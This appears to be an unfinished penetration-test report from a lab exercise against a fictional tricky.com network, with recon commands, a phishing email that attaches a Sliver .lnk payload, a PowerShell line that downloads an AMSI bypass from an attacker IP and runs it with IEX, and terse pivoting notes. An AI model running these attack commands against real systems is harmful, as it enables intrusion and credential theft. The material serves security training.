Detailed Findings and Recommendations
The scope of this penetration test is to identify, exploit and report the results of of penetration test performed on following set of IP addresses.
| IPs |
|---|
| 172.16.240.150 |
| 192.168.240.159 |
| 172.16.240.151 |
| 172.16.240.152 |
| 172.16.240.155 |
Reconnaissance
RustScan
The initial rustscan results shows few open port on machine 192.169.240.159.
rustscan -a ips.txt --ulimit 5000 -- -Pn -sC -sV -oA network
Open 192.168.240.159:3389
Open 192.168.240.159:5985
Open 192.168.240.159:47001
Open 192.168.240.159:49665
Open 192.168.240.159:49666
Open 192.168.240.159:49664
Open 192.168.240.159:49667
Open 192.168.240.159:49668
Open 192.168.240.159:49669
Open 192.168.240.159:49670
Open 192.168.240.159:49671
Open 192.168.240.159:49672The Nmap scan result returned from the scan gave information about the NetBIOS name.
Other available ports doesn’t seems to give much information that can be used for gaining initial access to the system.
The Rust scan results doesn’t show port 445 open but just to confirm the finding, I used CrackMapExec which shows that port 445 is open indeed.
cme smb ips.txt
SMB 192.168.240.159 445 MAIL01 [*] Windows 10.0 Build 17763 x64 (name:MAIL01) (domain:tricky.com) (signing:False) (SMBv1:False)Based on the output it’s also clear that signing is set to False which can open the possibility for poison and relay attacks. Staring the Responder for catching the NTLM hashes.
sudo responder -I tun0While waiting for the nmap results to be finished I also check port 80 as Rustscan missed port 445 I thought , I would hurt to check the port 80, which indeed gave me fruitful result.
curl http://192.168.240.159<html>
<head>
<title>Tricky.com Mail system information</title>
</head>
<body>
<h1>Contact information</h1>
<p>Will@tricky.com serves in the clerks office for mail administration. You can mail him about issues with the mail system.</p>
<p>Note that due to security issues arising from malicious mails, we have implemented very good security on the clients, such as antivirus, application whitelisting and removed all Office products.</p>
</body>
</html> After gathering all the information the best probable way to obtain the initial access could be to send a malicious email to user will. The website also reveals that they don’t have office product, they have antivirus and in addition application whitelisting is also in place. It means that user will might click on the the file we send.
Possible Payload Requirements
- It should bypass AV.
- It should bypass application whitelisting.
- It should work without office products.
Resource Development
Initial Compromise
swaks --to Will@tricky.com --from bad@motherfucker.com --server 192.168.240.159 --header "Subject: Test Email" --body "This is a test email." --attach @./sliver64.lnk
migrate -p conhost.exe (find pid)
Client09 (172.16.240.155)
(New-Object System.Net.WebClient).DownloadString('http://192.168.45.159:80/amsi64.txt') | IEX
Uncpath
for both of them just interchanging the ips
then write dacl into mailadmins and adding svcsql in mailadmins group
then on mail09 ligolo
Additional Items
Appendix - AMSI Bypass code
Appendix - Powershell Shellcoderunner
Appendix - ANOTHER_SHELLCODE_USED Shellcoderunner Code
Appendix - Risk Assessment Matrix
Appendix - Proof and Local Contents
| Hostname | local.txt Contents | proof.txt Contents |
|---|---|---|
| HOSTNAME | foo | bar |
| HOSTNAME | foo | bar |
Appendix - Credentials obtained
NTLM Hashes
| Username | NTLM Hash | Found in |
|---|---|---|
| Administrator | HASH | HOSTNAME |
Passwords
| Found in | Corresponds to | Password |
|---|---|---|
| HOSTNAME | USER BELONGS | Password123* |
Credential’s files
| Found in | File | Type |
|---|---|---|
| HOSTNAME | FILE FROM WHERE IS IT | Example: SSH Priv. Key |